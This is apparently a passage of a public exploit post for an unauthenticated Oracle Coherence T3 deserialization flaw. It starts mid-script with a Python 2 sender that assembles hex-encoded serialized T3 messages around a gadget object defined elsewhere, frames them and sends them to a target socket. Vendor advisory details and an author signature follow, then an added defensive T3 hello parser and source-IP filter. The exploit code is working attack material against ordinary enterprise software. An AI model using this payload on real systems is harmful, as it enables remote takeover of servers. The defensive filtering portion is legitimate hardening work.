payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'

# First 4 bytes of a T3 message carry its total length, big-endian
payload=struct.pack('>I',len(payload)) + payload[4:]
print '[+] Sending payload...'
sock.send(payload)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data

[Vendor]
Oracle

[Vulnerability Type]
Network Remote

[Description]
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
[Disclosure Timeline]
2019/12/10

[+] Disclaimer
The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

[Video]
https://www.youtube.com/watch?v=59jt8rr8ECc

@nu11secur1ty
--
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
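The description says the attacker needs unauthenticated network access via T3, and the script opens with a plain-text T3 client hello followed by length-prefixed messages. As an added defensive example (not part of the post above), the Python below parses that hello the way a connection filter or network sensor would and decides, by source address, whether T3 should be accepted at all; the sample hello is modelled on the script's header line and the trusted ranges are assumed placeholders.

```python
import ipaddress
import struct

# Constructed sample modelled on the handshake the exploit script sends.
SAMPLE_HELLO = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"

# Assumed connection-filter policy (placeholder networks, not from the advisory):
# only localhost and an admin network may speak T3; every other source is denied.
T3_ALLOWED_SOURCES = [ipaddress.ip_network("127.0.0.0/8"),
                      ipaddress.ip_network("10.10.0.0/24")]


def parse_t3_hello(data: bytes):
    """Parse a T3 client hello: 't3 <version>' (or 't3s') on the first line,
    KEY:value lines after it, terminated by a blank line. Returns a dict of the
    fields, or None when the bytes are not a T3 hello (e.g. an HTTP request)."""
    head, sep, _rest = data.partition(b"\n\n")
    if not sep:
        return None
    first, *rest = head.split(b"\n")
    proto, _, version = first.partition(b" ")
    if proto not in (b"t3", b"t3s") or not version:
        return None
    fields = {"protocol": proto.decode(), "version": version.decode()}
    for line in rest:
        key, colon, value = line.partition(b":")
        if not colon:
            return None
        fields[key.decode()] = value.decode(errors="replace")
    return fields


def framed_length(msg: bytes):
    """Declared length of a framed T3 message: the script writes it with
    struct.pack('>I', len(payload)) into the first 4 bytes. None if too short."""
    return struct.unpack(">I", msg[:4])[0] if len(msg) >= 4 else None


def t3_decision(src_ip: str, first_bytes: bytes) -> str:
    """Classify an inbound connection's first bytes like a T3 connection filter:
    'not-t3' (other protocol, out of scope here), 'allow' (T3 from a trusted
    source) or 'deny' (T3 from anywhere else, the exposure CVE-2020-2555 needs)."""
    hello = parse_t3_hello(first_bytes)
    if hello is None:
        return "not-t3"
    src = ipaddress.ip_address(src_ip)
    if any(src in net for net in T3_ALLOWED_SOURCES):
        return "allow"
    return "deny"
```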